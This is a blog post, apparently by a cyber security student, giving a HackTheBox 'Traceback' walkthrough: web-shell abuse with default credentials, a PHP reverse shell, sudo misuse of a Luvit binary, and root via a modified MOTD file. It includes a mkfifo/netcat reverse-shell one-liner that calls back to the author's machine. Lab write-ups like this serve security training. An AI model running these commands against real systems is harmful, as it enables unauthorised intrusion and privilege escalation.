HackTheBox Writeup — Traceback

Hack the Box is an online platform where you can practice your penetration testing skills. This is my write-up for the HackTheBox machine ‘Traceback’, which runs a Linux OS and is one of the ‘Easy’ rated machines.

1. Traceback Info Card.

1. Summary

The initial foothold on this box involves finding a hidden web-shell on an already compromised web-server and utilising this to upload our own PHP reverse shell to gain access as the ‘Webmin’ user. To escalate our privileges we exploit the fact that Webmin has Sysadmin privileges on a Luvit binary. Finally, to escalate to Root we modify one of the ‘Message of the Day’ files and exploit the fact that it always executes with Root privileges when anyone logs in via SSH.

2. Enumeration and Initial Foothold (Webmin)

2. Nmap Port Scan Results

The results show just two services running, SSH on port 22 and a web application running on port 80. I visited the web application and was presented with the page below.

3. Compromised Web Application on Port 80.

After inspecting the web page it was clear there was no functionality to interact with, however the HTML source code contains the following comment:

<!--Some of the best web shells that you might need ;) -->
4. HTML of Compromised Web Page.

This comment led me to do some OSINT gathering and led me to a popular Github repository that contained numerous PHP web-shells. The comment at the top of the repository matched the HTML source code comment exactly so I assumed I was on the right track. After appending http://10.10.10.181/smevk.php to the URL I was presented with the page below.

5. Compromised Web Application — Smevk Web-Shell Login Page.

I instantly tried admin:admin for the credentials as detailed in the Github repository and this was successful. I now had access to a web console that allowed me to upload PHP files, so I downloaded and modified a PHP reverse shell script from PenTestMonkey and uploaded this to the web console, which is named ‘JDR.php’.

6. Modified PHP Reverse Shell Script (JDR.php).
7. PHP-Reverse-Shell (JDR.php) Uploaded to Smevk Web Console.

Back on my Kali machine I opened up a netcat listener on port 9090 and issued the following curl command in another terminal window to make a HTTP GET request for the JDR.php file.

curl http://10.10.10.181/JDR.php

This allowed me to pop a reverse shell on the Traceback machine and gain an initial foothold as the ‘Webmin’ user.

8. Initial Foothold (Webmin) Shell.

3. User Shell — Sysadmin

After upgrading my shell, I ran a Linux enumeration script which returned three promising results.

  1. A strange ‘note.txt’ file within the Webmin home directory.
  2. Webmin has special permissions on a Luvit binary within the Sysadmin home directory.
  3. The Sysadmin home directory also contains a hidden SSH directory.
9. Contents of Note.txt and Webmin Special Permissions.

In short, the Luvit binary allows the execution of Lua scripts and since we have permission to run this with Sysadmin privileges, we can create a Lua script to insert our public RSA key into the Sysadmin’s hidden SSH directory.

10. Lua Script.

I then used a Python SimpleHTTPServer to host the Lua script temporarily and downloaded this to the Traceback machine using wget.

11. Downloading the Lua Script to Webmin’s home directory.

Now that the malicious Lua script is in the Webmin’s home directory, I used the command below to run the script with Sysadmin privileges.

sudo -u sysadmin /home/sysadmin/luvit 

Returning back to my Kali machine I logged in as Sysadmin via SSH.

12. Sysadmin Shell and User.txt

4. Root

Continuing the privilege escalation, I inspected the processes running on the Traceback machine using pspy64. I noticed that there was a process running as root that copies the ‘Message of the Day’ (motd) files from the backups directory into the /etc/update-motd.d/ directory every 30 seconds.

13. Interesting Process from Pspy64.

Navigating into this directory we can see that the Sysadmin user has write permissions on these files, and after inspecting the contents of the 00-header file I noticed that this is the same content that is displayed to the terminal when logging in with SSH (see image 12).

14. Write Permissions on MOTD files and

This means that if we can modify this file to execute a reverse shell command back to our machine, when we login as Sysadmin via SSH this command will execute with root privileges and we will have a shell as root, however this needs to be done quickly before the running process overwrites our changes. The reverse shell command that worked for me is the one below, which needs to be appended to the end of the ‘00-header’ file.

rm /tmp/f1; mkfifo /tmp/f1; cat /tmp/f1 | /bin/sh -i 2>&1 | nc 10.10.17.13 8888 > /tmp/f1
15. Reverse-Shell Command within 00-header File.

Opening up a netcat listener on port 8888 on our Kali machine, quickly logging as sysadmin via SSH drops us into a root shell where we can retrieve the root flag.

16. Root Shell and root.txt

5. Conclusion

This was my fifth owned machine on HackTheBox and definitely one of my favourites, although I wasn’t too keen on the initial stage as it felt like guess work rather than working something out. Nevertheless I learnt something new every step of the way, including learning a little bit about Lua and the importance of checking running processes.

Keep an eye out for my future write-ups!

--

--

--

MSc Cyber Security Student at Lancaster University. Mostly posting CTF writeups from HackTheBox, TryHackMe and VulnHub.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Step — Wise Web Deployment of Websites and Python Streamlit Apps

Using Redis Streams Consumer Group

Deploy Django application to aws cloud in 25 steps in much simpler way

INTRODUCING G-BOTS

An introduction to the Elixir programming language

Reduce Website Workload with AWS Service Auto-Scaling Group

Eteesstore-Eteesstore Customer Care Number 8101439614=8927156725…Eteesstore-Eteesstore Customer…

A mixed-integer programming problem

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jack Roberts

Jack Roberts

MSc Cyber Security Student at Lancaster University. Mostly posting CTF writeups from HackTheBox, TryHackMe and VulnHub.

More from Medium

Noter — HackTheBox [writeup]

Overpass CTF Walkthrough

Simple CTF TryHackMe Walkthrough

DEVZAT — HackTheBox WriteUp